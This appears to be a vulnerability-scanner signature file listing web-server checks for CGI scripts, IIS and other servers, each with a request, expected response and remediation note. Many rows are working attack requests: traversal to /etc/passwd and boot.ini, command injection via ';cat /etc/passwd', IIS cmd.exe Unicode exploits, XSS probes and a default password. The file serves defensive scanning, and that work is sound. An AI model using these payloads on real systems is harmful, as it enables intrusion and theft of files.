c,generic,@CGIDIRS,view-source?view-source,200,GET,"This allows remote users to view source code." c,generic,@CGIDIRS,viewlogs.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,viewsource?/etc/passwd,"root:",GET,"Allows attacker to retrieve arbitrary files. Remove from CGI directory." c,generic,@CGIDIRS,view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows reading of remote files." c,generic,@CGIDIRS,visadmin.exe,200,GET,"This CGI allows attacker to crash the web server. Remove it from the CGI directory." c,generic,@CGIDIRS,visitor.exe,200,GET,"May be interesting..." c,generic,@CGIDIRS,vote.cgi,200,GET,"Mike's Vote CGI contained a bug which allowed arbitrary command exectution (version 1.2), see http://freshmeat.net/projects/mikessurveycgi/" c,generic,@CGIDIRS,vq/demos/respond.pl?,"",GET,"vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. CA-2000-02." c,generic,@CGIDIRS,VsSetCookie.exe?,200,GET,"A flaw in VsSetCookie.exe may allow attackers to guess a correct user name & gain access to the Lucent system. See http://www.securityfocus.com for more information." c,generic,@CGIDIRS,w3-msql,200,GET,"This might be interesting..." c,generic,@CGIDIRS,w3-sql,200,GET,"This might be interesting..." c,generic,@CGIDIRS,way-board.cgi?db=/etc/passwd%00,"root:",GET,"Allows attackers to read arbitrary files from the server." c,generic,@CGIDIRS,way-board/way-board.cgi?db=/etc/passwd%00,"root:",GET,"Allows attackers to read arbitrary files from the server." c,generic,@CGIDIRS,wconsole.dll,200,GET,"It may be possible to overflow this dll with 1024 bytes of data." c,generic,@CGIDIRS,webais,200,GET,"This might be interesting..." c,generic,@CGIDIRS,webbbs.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,webbbs.exe,200,GET,"May be interesting..." c,generic,@CGIDIRS,webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd,"root:",GET,"WebBBS by Darryl Burgdorf is vulnerable to command execution." c,generic,@CGIDIRS,webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD,"root:",GET,"webcart.cgi allows remote command execution. Upgrade to the latest version." c,generic,@CGIDIRS,webdist.cgi?distloc=;cat%20/etc/passwd,"root:",GET,"This CGI allows attackers to read files remotely." c,generic,@CGIDIRS,webdriver,200,GET,"This CGI often allows anyone to access the Informix DB on the host." c,generic,@CGIDIRS,webgais,200,GET,"The webgais allows attackers to execute commands." c,generic,@CGIDIRS,webif.cgi,200,GET,"HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier." c,generic,@CGIDIRS,webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system." c,generic,@CGIDIRS,webmap.cgi,200,GET,"nmap front end...could be fun" c,generic,@CGIDIRS,Webnews.exe,200,GET,"Some versions of WebNews are vulnerable to a buffer overflow. See http://www.nextgenss.com/advisories/netwinnews.txt for more info." c,generic,@CGIDIRS,webnews.pl,200,GET,"WebNews may contain some default users in the binary: testweb/newstest, alwn3845/imaptest, alwi3845/wtest3452, testweb2/wtest4879" c,generic,@CGIDIRS,webplus.exe?about,"Product Information",GET,"Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability. Vers prior to 4.6 build 561 and 5.0 build 554 have a buffer overflow." c,generic,@CGIDIRS,webplus?about,"Product Information",GET,"Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability." c,generic,@CGIDIRS,webplus?script=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to retrieve files remotely." c,generic,@CGIDIRS,websendmail,200,GET,"This CGI may allow attackers to execute arbitrary commands remotely." c,generic,@CGIDIRS,webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read arbitrary files." c,generic,@CGIDIRS,webutil.pl,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner." c,generic,@CGIDIRS,webutils.pl,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner." c,generic,@CGIDIRS,webwho.pl,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner." c,generic,@CGIDIRS,wguest.exe,200,GET,"May be interesting..." c,generic,@CGIDIRS,whois.cgi?action=load&whois=%3Bid,"uid=",GET,"This script allows commands to be executed remotely." c,generic,@CGIDIRS,whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd,"root:",GET,"The whois.cgi allows any command to be executed on the system." c,generic,@CGIDIRS,whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd,"root:",GET,"The whois.cgi allows any command to be executed on the system." c,generic,@CGIDIRS,whois_raw.cgi?fqdn=%0Acat%20/etc/passwd,"root:",GET,"Allows attacker to view any file (and possibly execute commands). Upgrade to latest version" c,generic,@CGIDIRS,windmail,200,GET,"Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file" c,generic,@CGIDIRS,windmail.exe,200,GET,"Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file" c,generic,@CGIDIRS,WINDMAIL.EXE?%20-n%20c:\boot.ini%,"boot loader",GET,"WINDMAIL.EXE can read arbitrary files" c,generic,@CGIDIRS,WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\,200,GET,"WINDMAIL.EXE can read arbitrary files" c,generic,@CGIDIRS,wrap,200,GET,"This CGI lets users read any file with 755 perms. It should not be in the CGI directory." c,generic,@CGIDIRS,wrap.cgi,200,GET,"possible variation: comes with IRIX 6.2; allows to view directories" c,generic,@CGIDIRS,WS_FTP.ini,200,GET,"Can contain saved passwords for ftp sites" c,generic,@CGIDIRS,ws_ftp.ini,200,GET,"Can contain saved passwords for ftp sites" c,generic,@CGIDIRS,www-sql,200,GET,"This might be interesting..." c,generic,@CGIDIRS,wwwadmin.pl,200,GET,"Administration CGI?" c,generic,@CGIDIRS,wwwboard.cgi.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,wwwboard.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,wwwstats.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,wwwthreads/3tvars.pm,200,GET,"This might be interesting..." c,generic,@CGIDIRS,wwwthreads/w3tvars.pm,200,GET,"This might be interesting..." c,generic,@CGIDIRS,wwwwais,"UNISYS WEB SEARCH ENGINE",GET,"Unisys web server wais search found." c,generic,@CGIDIRS,wwwwais,200,GET,"wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage." c,generic,@CGIDIRS,YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI lets users read any file with http daemon's permissions. Upgrade to latest version" c,generic,@CGIDIRS,YaBB/YaBB.cgi?board=BOARD&action=display&num=,"",GET,"YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,zml.cgi?file=../../../../../../../../../../etc/passwd%00,"root:",GET,"Ztreet Markup Language interpreter allows arbitrary file to be read remotely." c,generic,@CGIDIRS,zsh,200,GET,"Shell found in CGI dir!" c,goaheadwebs,/,..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini,"boot loader",GET,"GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval, upgrade to the latest version." c,goaheadwebs,/,,"",GET,"GoAhead Web Server 2.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,goaheadwebs,/,goform/CheckLogin?login=root&password=tslinux,"MainPageTable",GET,"The Cyclades' web user 'root' still has the default password 'tslinux' set, this should be changed immediately. Also, the id/password is hashed to create the sessionId cookie, which is bad." c,icecast,/,file/../../../../../../../../etc/,200,GET,"The Icecast server allows the file system to be probed for directory structure, but does not allow arbitrary file retrieval." c,iis,/,".shtm",".shtml",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,iis,/,".stm",".shtml",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,iis,/,"readme.eml",200,GET,"Remote server may be infected with the Nimda virus." c,iis,/,................../config.sys,200,GET,"PWS allows files to be read by prepending multiple '.' characters. At worst, IIS, not PWS, should be used." c,iis,/,../../../../../../../../../boot.ini,"boot loader",GET,"The remote server allows any system file to be retrieved remotely." c,iis,/,..\\..\\..\\..\\..\\..\\..\\boot.ini,"boot loader",GET,"It is possible to read files on the server by adding /../ in front of file name." c,iis,/,?\">,,GET,"IIS is vulnerable to Cross Site Scriptin (XSS). Apply MS02-018." c,iis,/,adsamples/config/site.csc,200,GET,"This might be interesting..." c,iis,/,advworks/equipment/catalog_type.asp,200,GET,"Just found this file..." c,iis,/,blahb.ida,200,GET,"Reveals physical path. Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings." c,iis,/,blahb.idq,200,GET,"Reveals physical path. Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings." c,iis,/,carbo.dll,200,GET,"This might be interesting..." c,iis,/,global.asa,"RUNAT",GET,"The global.asa file was retrieved, which may contain sensitive information. Map the .asa extension to the proper dll." c,iis,/,iisadmin/,200,GET,"Access to /iisadmin should be restricted to localhost or allowed hosts only." c,iis,/,iisadmpwd/aexp2.htr,200,GET,"Gives domain and system name, may allow an attacker to brute force for access." c,iis,/,iisadmpwd/aexp2b.htr,200,GET,"Gives domain and system name, may allow an attacker to brute force for access." c,iis,/,iisadmpwd/aexp3.htr,200,GET,"Gives domain and system name, may allow an attacker to brute force for access." c,iis,/,iisadmpwd/aexp4.htr,200,GET,"Gives domain and system name, may allow an attacker to brute force for access." c,iis,/,iisadmpwd/aexp4b.htr,200,GET,"Gives domain and system name, may allow an attacker to brute force for access." c,iis,/,JUNK(10),"SecureIIS application",GET,"Server appears to be running eEye's SecureIIS application, http://www.eeye.com/." c,iis,/,JUNK(10)abcd.html,"escape",GET,"The IIS server may be vulnerable to Cross Site Scripting (XSS) in error messages, see MS02-018" c,iis,/,nul..cfm,"The template specification",GET,"ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices." c,iis,/,nul..dbm,"The template specification",GET,"ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices." c,iis,/,nul.cfm,"The requested file",GET,"ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices." c,iis,/,nul.dbm,"The requested file",GET,"ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices." c,iis,/,null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full,"<html>",GET,"It is possible to retrieve the source of .asp files. Install Webhits patch at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp" c,iis,/,NULL.printer,"Error in web printer install",GET,"Internet Printing (IPP) is enabled. Some versions have a DoS, disabling the .printer mapping is recommended." c,iis,/,prd.i/pgen/,200,GET,"has MS Merchant Server 1.0" c,iis,/,query.idq??CiTemplate=../../../../../../../../../../winnt/win.ini,"[fonts]",GET,"This DLL allows attackers to read files remotely." c,iis,/,sam,200,GET,"This might be interesting..." c,iis,/,sam.bin,200,GET,"This might be interesting..." c,iis,/,sam._,200,GET,"This might be interesting..." c,iis,/,samples/search/queryhit.htm,200,GET,"This might be interesting..." c,iis,/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/,trace.axd,"Application Trace",GET,"The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests." c,iis,/,upload.asp,200,GET,"An ASPpage that allows attackers to upload files to server" c,iis,/,uploadn.asp,200,GET,"An ASPpage that allows attackers to upload files to server" c,iis,/,uploadx.asp,200,GET,"An ASPpage that allows attackers to upload files to server" c,iis,/,wa.exe,200,GET,"An ASPpage that allows attackers to upload files to server" c,iis,/,whatever.htr,"Error: The requested file could not be found. ",GET,"Reveals physical path. htr files may also be vulnerabe to an off-by-one overflow that allows remote command execution (see MS02-018)" c,iis,/,whatever.htr,200,GET,"Reveals physical path. htr files may also be vulnerabe to an off-by-one overflow that allows remote command execution (see MS02-018)" c,iis,/../../../../winnt/repair/,sam._,200,GET,"Sam backup successfully retrieved." c,iis,/admentor/admin,admin.asp,200,GET,"Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =" c,iis,/admin/,adminproc.asp,200,GET,"Xpede administration page may be available. The /admin directory should be protected." c,iis,/admin/,datasource.asp,200,GET,"Xpede administration page may be available (this page reveals SQL account name). The /admin directory should be protected." c,iis,/asp/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/asp/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/c/winnt/system32/,cmd.exe?/c+dir+/OG,"Directory of C",GET,"This machine is infected with Code Red, or has Code Red leftovers." c,iis,/cgi-bin/,snorkerz.bat,200,GET,"Arguments passed to DOS CGI without checking" c,iis,/cgi-bin/,snorkerz.cmd,200,GET,"Arguments passed to DOS CGI without checking" c,iis,/cgi-win/,uploader.exe,200,GET,"This CGI allows attackers to upload files to the server and then execute them." c,iis,/clocktower,/,200,GET,"Site Server sample files. This might be interresting." c,iis,/contents/extensions/asp/,1,200,GET,"The IIS system may be vulnerable to a DOS, see MS02-018 for details." c,iis,/exchange/,root.asp?acs=anon,/exchange/logonfrm.asp,GET,"This allows anonymous access to portions of the OWA server. http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc" c,iis,/exchange/lib/,AMPROPS.INC,"Logon functions",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,ATTACH.INC,"File upload",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,DELETE.INC,"deleting objects",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,GETREND.INC,"GetRenderer functions",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,GETWHEN.INC,"functions to construct",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,JSATTACH.INC,"Attachment Javascript",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,JSROOT.INC,"Javascript Functions",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,JSUTIL.INC,"Common Javascript",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,LANG.INC,"localized strings",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,logon.inc,"Logon functions",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,PAGEUTIL.INC,"functions that help",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,PUBFLD.INC,"Anonymous Published",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,RENDER.INC,"Rendering functions",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/exchange/lib/,SESSION.INC,"Session Management",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" c,iis,/iissamples/,exair/howitworks/Code.asp,200,GET,"This might be interesting..." c,iis,/iissamples/,exair/howitworks/Codebrw1.asp,200,GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/,sdk/asp/docs/codebrw2.asp,200,GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/,sdk/asp/docs/codebrws.asp,200,GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/exair/howitworks/,codebrws.asp,"ASP Source code browser",GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/exair/search/,advsearch.asp,200,GET,"This can be used to DoS IIS" c,iis,/iissamples/exair/search/,query.asp,200,GET,"This can be used to DoS IIS" c,iis,/iissamples/exair/search/,query.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/exair/search/,search.asp,200,GET,"This can be used to DoS IIS" c,iis,/iissamples/exair/search/,search.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/issamples/,codebrws.asp,"Sample ASP Search Form",GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/issamples/,fastq.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/issamples/,query.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/issamples/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/iissamples/issamples/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/iissamples/issamples/oop/,qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full,"This is the formatting page for webhits full highlighting",GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/issamples/oop/,qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full,"This is the formatting page for webhits summary highlighting.",GET,"This is a default IIS script/file which should be removed." c,iis,/iissamples/sdk/asp/docs/,codebrws.asp,"View Active Server Page Source",GET,"IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed." c,iis,/iissamples/sdk/asp/docs/,CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp,"Path not found",GET,"CodeBrws.asp can be used to determine if a file system path exists or not." c,iis,/iissamples/sdk/asp/docs/,CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp,200,GET,"IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root." c,iis,/isapi/,tstisapi.dll,"Pi3web",GET,"The test tstisapi.dll is available and can allow attackers to execute commands remotely." c,iis,/ISSamples/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/ISSamples/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/market,/,200,GET,"Site Server sample files. This might be interresting." c,iis,/msadc/,"..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c",[winnt],GET,"Can issue arbitrary commands to host." c,iis,/msadc/,msadcs.dll,200,GET,"See RDS advisory, RFP9902 (wiretrip.net), CVE-1999-1011" c,iis,/msadc/,samples/adctest.asp,200,GET,"This may allow remote code execution on the server." c,iis,/msadc/Samples/selector/,showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini,"[fonts]",GET,"This allows attackers to read arbitrary files on the host." c,iis,/mspress30,/,200,GET,"Site Server sample files. This might be interresting." c,iis,/oc/Search/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/oc/Search/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/ows-bin/,oaskill.exe?abcde.exe,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,iis,/ows-bin/,oasnetconf.exe?-l%20-s%20BlahBlah,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,iis,/pbserver/,pbserver.dll,200,GET,"This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/ms00-094.asp" #this test needs reworking - dave #c,iis,/prxdocs/misc/,prxrch.idq,200,GET,"This may allow arbitrary files to be retrieved from the server." c,iis,/scripts,/proxy/w3proxy.dll,502,GET,"MSProxy v1.0 installed" c,iis,/scripts/,"..%255c..%255cwinnt/system32/cmd.exe?/c+ver","[Version]",GET,"IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708." c,iis,/scripts/,"..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\","boot.ini",GET,"IIS Unicode problem... http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2, CVE-2000-0884" c,iis,/scripts/,counter.exe,200,GET,"This might be interesting..." c,iis,/scripts/,cphost.dll,200,GET,"This might be interresting" c,iis,/scripts/,cpshost.dll,200,GET,"posting acceptor...possibly allows you to upload files" c,iis,/scripts/,fpadmcgi.exe,200,GET,"This might be interesting..." c,iis,/scripts/,iisadmin/ism.dll,200,GET,"allows you to mount a brute force attack on passwords" c,iis,/scripts/,no-such-file.pl,"perl script",GET,"Using perl.exe allows attacker to view host info. Use perlis.dll instead." c,iis,/scripts/,postinfo.asp,200,GET,"This might be interesting..." c,iis,/scripts/,repost.asp,"Here is your upload status",GET,"This allows uploads to /users. Create /users and give web user read only access." c,iis,/scripts/,root.exe?/c+dir+c:\+/OG,"Directory of C",GET,"This machine is infected with Code Red, or has Code Red leftovers." c,iis,/scripts/,samples/ctguestb.idc,200,GET,"This might be interesting..." c,iis,/scripts/,samples/details.idc,200,GET,"See RFP 9901; www.wiretrip.net" c,iis,/scripts/,samples/search/webhits.exe,200,GET,"This might be interesting..." c,iis,/scripts/,tools/getdrvrs.exe,200,GET,"This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll)" c,iis,/scripts/,tools/newdsn.exe,200,GET,"This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server." c,iis,/scripts/Carello/,Carello.dll,200,GET,"Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto." c,iis,/scripts/iisadmin/,bdir.htr,200,GET,"This default script shows host info and may allow file browsing,request /scripts/iisadmin/bdir.htr??c:\" c,iis,/scripts/samples/search/,author.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be removed." c,iis,/scripts/samples/search/,filesize.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be removed." c,iis,/scripts/samples/search/,filetime.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be removed." c,iis,/scripts/samples/search/,queryhit.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be removed." c,iis,/scripts/samples/search/,simple.idq,"The template file can not be found in the location specified",GET,"This is a default IIS script/file which should be removed." c,iis,/scripts/tools/,ctss.idc,200,GET,"This CGI allows remote users to view and modify SQL DB contents." c,iis,/scripts/tools/,dsnform,200,GET,"An oldie but goodie... allows creation of ODBC Data Source" c,iis,/scripts/tools/,dsnform.exe,200,GET,"An oldie but goodie... allows creation of ODBC Data Source" c,iis,/search/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/search/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/search/htx/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/search/htx/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings." c,iis,/servlet/,com.newatlanta.servletexec.JSP10Servlet/,"The file was not found",GET,"ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS discloses the web root. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp" c,iis,/servlet/,com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa,"OBJECT RUNAT=Server",GET,"ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS can reveal source code. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp" c,iis,/Sites/Knowledge/Membership/Inspired/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine." c,iis,/Sites/Knowledge/Membership/Inspiredtutorial/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine." c,iis,/Sites/Samples/Knowledge/Membership/Inspired/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine." c,iis,/Sites/Samples/Knowledge/Membership/Inspiredtutorial/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine." c,iis,/Sites/Samples/Knowledge/Push/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine." c,iis,/Sites/Samples/Knowledge/Search/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine." c,iis,/SiteServer/admin/,findvserver.asp,200,GET,"Gives a list of installed Site Server components" c,iis,/SiteServer/Admin/commerce/foundation/,domain.asp,200,GET,"Displays known domains of which that server is involved." c,iis,/SiteServer/Admin/commerce/foundation/,driver.asp,200,GET,"Displays a list of installed ODBC drivers." c,iis,/SiteServer/Admin/commerce/foundation/,DSN.asp,200,GET,"Displays all DSNs configured for selected ODBC drivers." c,iis,/SiteServer/Admin/knowledge/dsmgr/,default.asp,200,GET,"USed to view current search catalog configurations" c,iis,/SiteServer/Admin/knowledge/dsmgr/users/,GroupManager.asp,200,GET,"Used to create, modify, and potentially delete LDAP users and groups." c,iis,/SiteServer/Admin/knowledge/dsmgr/users/,UserManager.asp,200,GET,"Used to create, modify, and potentially delete LDAP users and groups." c,iis,/SiteServer/Admin/knowledge/persmbr/,vs.asp,200,GET,"Expose various LDAP service and backend configuration parameters" c,iis,/SiteServer/Admin/knowledge/persmbr/,VsLsLpRd.asp,200,GET,"Expose various LDAP service and backend configuration parameters" c,iis,/SiteServer/Admin/knowledge/persmbr/,VsPrAuoEd.asp,200,GET,"Expose various LDAP service and backend configuration parameters" c,iis,/SiteServer/Admin/knowledge/persmbr/,VsTmPr.asp,200,GET,"Expose various LDAP service and backend configuration parameters" c,iis,/SiteServer/Knowledge/,Default.asp?ctr=\">,,GET,"Site Server is vulnerable to Cross Site Scripting" c,iis,/SiteServer/Publishing/,ViewCode.asp,200,GET,"The default ViewCode.asp can allow an attacker to read any file on the machine." c,iis,/siteserver/publishing/,viewcode.asp?source=/default.asp,200,GET,"May be able to view source code using Site Server vulnerability." c,iis,/ssi/,envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to read files from the server." c,iis,/vc30,/,200,GET,"Site Server sample files. This might be interresting." c,iis,/_mem_bin,/,200,GET,"This might be interresting - User Login" c,iis,/_mem_bin/,auoconfig.asp,200,GET,"Displays the default AUO (LDAP) schema, including host and port." c,iis,/_mem_bin/,FormsLogin.asp,200,GET,"This might be interresting - User Login" c,iis,/_mem_bin/,formslogin.asp?\">,,GET,"Site Server is vulnerable to Cross Site Scripting" c,iis,/_mem_bin/,remind.asp,200,GET,"Page will give the password reminder for any user requested (username must be known)." c,iis,/_vti_bin/,shtml.exe,200,GET,"shtml.exe is available remotely. Some versionsof the Front Page ISAPI filter are vulnerable to a DOS (not attempted), see MS-018 for details." c,iis,/_vti_pvt/,access.cnf,200,GET,"IIS is configured to allow users to read .cnf files, which may contain sensitive information. Configure IIS not to display .cnf files or make sure they are not readable by everyone." c,iis,/_vti_pvt/,service.cnf,200,GET,"IIS is configured to allow users to read .cnf files, which may contain sensitive information. Configure IIS not to display .cnf files or make sure they are not readable by everyone." c,iis,/_vti_pvt/,services.cnf,200,GET,"IIS is configured to allow users to read .cnf files, which may contain sensitive information. Configure IIS not to display .cnf files or make sure they are not readable by everyone." c,iis,/_vti_pvt/,svcacl.cnf,200,GET,"IIS is configured to allow users to read .cnf files, which may contain sensitive information. Configure IIS not to display .cnf files or make sure they are not readable by everyone." c,iis,/_vti_pvt/,writeto.cnf,200,GET,"IIS is configured to allow users to read .cnf files, which may contain sensitive information. Configure IIS not to display .cnf files or make sure they are not readable by everyone." c,iis,@CGIDIRS,tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to execute arbitrary commands on the server." #more false positives than something with a lot - dave #c,iis,@CGIDIRS,/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,iis,@CGIDIRS,/_vti_pvt/doctodep.btr,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,iis,@CGIDIRS,cfgwiz.exe,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,iis,@CGIDIRS,Cgitest.exe,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,iis,@CGIDIRS,cmd.exe?/c+dir,200,GET,"cmd.exe can execute arbitrary commands" c,iis,@CGIDIRS,cmd1.exe?/c+dir,200,GET,"cmd1.exe can execute arbitrary commands" c,iis,@CGIDIRS,fpsrvadm.exe,200,GET,"Potentially vulnerable CGI program." c,iis,@CGIDIRS,hello.bat?&dir+c:\,200,GET,"This batch file may allow attackers to execute remote commands." c,iis,@CGIDIRS,input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to read files from the server." c,iis,@CGIDIRS,input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to read files from the server." c,iis,@CGIDIRS,mailform.exe,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,iis,@CGIDIRS,ms_proxy_auth_query/,200,GET,"This might be interesting... has been seen in web logs from a scanner." 